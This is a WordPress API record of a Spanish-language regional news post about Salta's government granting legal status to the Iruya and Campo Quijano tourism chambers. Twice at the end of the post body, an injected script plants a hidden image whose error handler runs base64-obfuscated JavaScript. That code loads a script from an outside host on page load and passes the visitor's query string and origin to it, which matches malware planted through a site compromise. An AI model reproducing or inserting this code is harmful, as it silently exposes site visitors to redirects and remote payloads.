{"id":1779,"date":"2022-11-11T10:10:11","date_gmt":"2022-11-11T13:10:11","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1779"},"modified":"2025-08-14T00:30:29","modified_gmt":"2025-08-14T03:30:29","slug":"las-camaras-turisticas-de-iruya-y-campo-quijano-cuentan-con-personeria-juridica","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1779","title":{"rendered":"Las c\u00e1maras tur\u00edsticas de Iruya y Campo Quijano cuentan con personer\u00eda jur\u00eddica"},"content":{"rendered":"\n<h4 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#420716\"><em>Este instrumento legal les permite afianzarse como un \u00f3rgano representativo del sector privado de cada localidad, articular con el sector p\u00fablico y gestionar de manera coordinada el crecimiento de la actividad.<\/em><\/h4>\n\n\n\n<p>El objetivo planteado en el marco del plan Liderar de potenciar la regionalizaci\u00f3n tur\u00edstica de Salta tiene como requerimiento asociado, el avance institucional del sector privado como socio estrat\u00e9gico de lo p\u00fablico.<\/p>\n\n\n\n<p>El Gobierno provincial entreg\u00f3 a las c\u00e1maras tur\u00edsticas de Campo Quijano y de Iruya el documento de personer\u00eda jur\u00eddica que es un reconocimiento como la entidad representativa del sector privado, en este caso tur\u00edstico, de ambas localidades.<\/p>\n\n\n\n<p>El acto de entrega que se desarroll\u00f3 en el Centro de Convenciones Salta, estuvo encabezado por el vicegobernador Antonio Marocco junto al ministro de Turismo y Deportes&nbsp;<strong>Mario Pe\u00f1a<\/strong>&nbsp;y el secretario de Gobierno, Rodrigo Monzo y el intendente de Campo Quijano, Carlos Folloni. La C\u00e1mara de Turismo de Iruya est\u00e1 presidida por Mar\u00eda Fernanda Alcoba Ruiz y la de Campo Quijano por Ren\u00e9 Ramos.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-full is-resized\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1847-las-camaras-turisticas-de-iruya-y-campo-quijano-cuentan-con-personeria-juridica.jpg\" alt=\"\" class=\"wp-image-1780\" width=\"419\" height=\"279\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1847-las-camaras-turisticas-de-iruya-y-campo-quijano-cuentan-con-personeria-juridica.jpg 901w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1847-las-camaras-turisticas-de-iruya-y-campo-quijano-cuentan-con-personeria-juridica-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1847-las-camaras-turisticas-de-iruya-y-campo-quijano-cuentan-con-personeria-juridica-768x511.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1847-las-camaras-turisticas-de-iruya-y-campo-quijano-cuentan-con-personeria-juridica-696x463.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1847-las-camaras-turisticas-de-iruya-y-campo-quijano-cuentan-con-personeria-juridica-631x420.jpg 631w\" sizes=\"(max-width: 419px) 100vw, 419px\" \/><\/figure><\/div>\n\n\n<p>Ambas c\u00e1maras manifestaron coincidencia en los objetivos del plan Liderar y su car\u00e1cter federal, entendiendo las necesidades y potencialidad de cada regi\u00f3n tur\u00edstica.&nbsp;<\/p>\n\n\n\n<p>\u00abEn la actividad tur\u00edstica, para el sector p\u00fablico es de suma importancia que la parte privada est\u00e9 representada a trav\u00e9s de c\u00e1maras porque esto fortalece el trabajo conjunto que en Salta es una pol\u00edtica de estado\u201d, indic\u00f3 el ministro Mario Pe\u00f1a ante los referentes de ambas instituciones.<\/p>\n\n\n\n<p>El presidente de la C\u00e1mara de Turismo de Salta, Gustavo Di M\u00e9cola se\u00f1al\u00f3 que \u201cel futuro exitoso del turismo en Salta est\u00e1 ligado primero al profesionalismo\u201d e indic\u00f3 que \u201cla mejor forma de canalizar las necesidades del sector, es articular con el sector p\u00fablico a trav\u00e9s de las c\u00e1maras\u201d.&nbsp;<\/p>\n\n\n\n<p>Rodrigo Monzo expres\u00f3 que \u00abentregar una personer\u00eda es abrir una puerta para el desarrollo de una organizaci\u00f3n\u00bb y asegur\u00f3 que \u00abse hace un constante acompa\u00f1amiento a las instituciones que as\u00ed lo requieran\u00bb. Tambi\u00e9n estuvo presente la subsecretaria de Inspecci\u00f3n General de Personas Jur\u00eddicas, Ver\u00f3nica Miranda, cuyo organismo estuvo a cargo de la gesti\u00f3n del proceso administrativo.<\/p>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/las-camaras-turisticas-de-iruya-y-campo-quijano-cuentan-con-personeria-juridica-86080\" target=\"_blank\" rel=\"noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Este instrumento legal les permite afianzarse como un \u00f3rgano representativo del sector privado de cada localidad, articular con el sector p\u00fablico y gestionar de manera coordinada el crecimiento de la actividad. El objetivo planteado en el marco del plan Liderar de potenciar la regionalizaci\u00f3n tur\u00edstica de Salta tiene como requerimiento asociado, el avance institucional del [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1781,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,20],"tags":[],"class_list":{"0":"post-1779","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-empresas"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1779"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1779"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1779\/revisions"}],"predecessor-version":[{"id":7279,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1779\/revisions\/7279"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1781"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1779"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1779"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1779"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}